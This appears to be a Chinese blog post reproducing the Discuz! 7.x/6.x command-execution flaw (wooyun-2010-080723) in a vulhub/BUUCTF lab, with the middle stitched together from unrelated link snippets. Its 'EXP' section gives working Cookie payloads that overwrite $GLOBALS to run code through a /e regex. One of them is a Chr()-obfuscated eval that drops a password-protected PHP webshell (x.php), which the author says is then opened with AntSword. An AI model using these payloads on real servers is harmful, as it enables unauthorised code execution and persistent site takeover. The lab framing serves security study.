discuz wooyun-2010-080723

本文详细介绍了如何利用 Discuz! 7.x版本的命令执行漏洞(wooyun-2010-080723),通过覆盖$_REQUEST中的$GLOBALS实现代码执行。实验环境包括Windows10和Ubuntu18 Docker靶场,展示了漏洞原理、复现步骤和实际操作过程,包括设置Cookie和访问URL获取shell。
摘要由CSDN通过智能技术生成

漏洞复现-Discuz-命令执行(wooyun-2010-080723) - 铺哩 - 博客园0x00 实验环境 攻击机:win10 靶机:Ubuntu18 (docker搭建的vulhub靶场) 0x01 影响版本 Discuz 7.x 6.x版本 0x02 实验目的 学习discuz的部分https://www.cnblogs.com/cute-puli/p/13333991.htmlbuuctf [Discuz]wooyun-2010-080723_Fatesec的博客-CSDN博客漏洞描述由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。https://www.secpulse.com/archives/2338.htmlhttps://www.freebuf.com/articles/web/226207.html漏洞复现http://node3.buuoj.cn:28226/install/来安装dihttps://blog.csdn.net/qq_36241198/article/details/115151040Chr(39)是什么意思_百度知道https://zhidao.baidu.com/question/6807826.html漏洞复现-Discuz-命令执行(wooyun-2010-080723)icon-default.png?t=M1FBhttps://www.bbsmax.com/A/gVdnexpX5W/

 

# EXP
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))



在上述代码中,文件为:x.php   密码为: pwd
然后我们访问http://[IP]:[Port]/x.php,连上写入的马,使用蚁剑连接成功,这样就getshell了:

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值